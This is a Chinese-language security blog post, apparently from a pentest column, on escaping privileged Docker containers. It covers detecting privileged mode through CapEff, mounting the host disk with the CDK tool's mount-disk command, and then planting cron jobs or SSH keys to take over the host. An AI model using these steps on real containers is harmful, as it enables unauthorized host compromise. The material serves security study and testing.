前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Docker Privileged特权逃逸

Docker Privileged特权逃逸

作者头像
Al1ex
发布2023-05-12 11:30:31
1.9K0
发布2023-05-12 11:30:31
举报
文章被收录于专栏:网络安全攻防网络安全攻防
文章前言

在Docker中Privileged是一种特殊的权限模式,它允许Docker容器在启动时获取到与宿主机相同的权限级别。具体来说,Privileged权限可以让容器拥有以下能力:

1、访问宿主机的所有设备文件 2、在容器内部运行与宿主机上相同的内核模块 3、能够修改容器内部的网络配置 4、可以使用mount命令挂载宿主机上任意文件系统

需要注意的是使用Privileged权限可以给容器带来更高的权限,但同时也会带来安全风险。因此,在使用Privileged权限时应该非常谨慎,并且只应该在特定场景下使用,例如需要进行底层系统调试或者测试等需要访问宿主机资源的场景。

漏洞概述

操作者使用特权模式启动的容器时,Docker管理员可以通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令

环境搭建
代码语言:javascript
复制
docker run -v /home/ubuntu/cdk:/cdk --rm -it --privileged ubuntu bash
特权检测

在容器中时可以通过如下参数检测当前容器是否是以特权模式启动:

代码语言:javascript
复制
cat /proc/self/status | grep CapEff

如果是以特权模式启动的话,CapEff对应的掩码值为0000003fffffffff

通过capsh命令可以解码出具体的Capabilitie

漏洞利用

Step 1:容器内部执行以下命令

代码语言:javascript
复制
./cdk run mount-disk

Step 2:在容器内部进入挂载目录,直接管理宿主机磁盘文件

代码语言:javascript
复制
cd /tmp/cdk_dyyop
ls -al

Step 3:之后写入计划任务或者通过写入SSH公钥并进行远程连接获取主机权限即可(ubuntu中计划任务总是有问题很迷)

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-04-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 七芒星实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 文章前言
  • 漏洞概述
  • 环境搭建
  • 特权检测
  • 漏洞利用
相关产品与服务
容器镜像服务
容器镜像服务(Tencent Container Registry,TCR)为您提供安全独享、高性能的容器镜像托管分发服务。您可同时在全球多个地域创建独享实例,以实现容器镜像的就近拉取,降低拉取时间,节约带宽成本。TCR 提供细颗粒度的权限管理及访问控制,保障您的数据安全。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档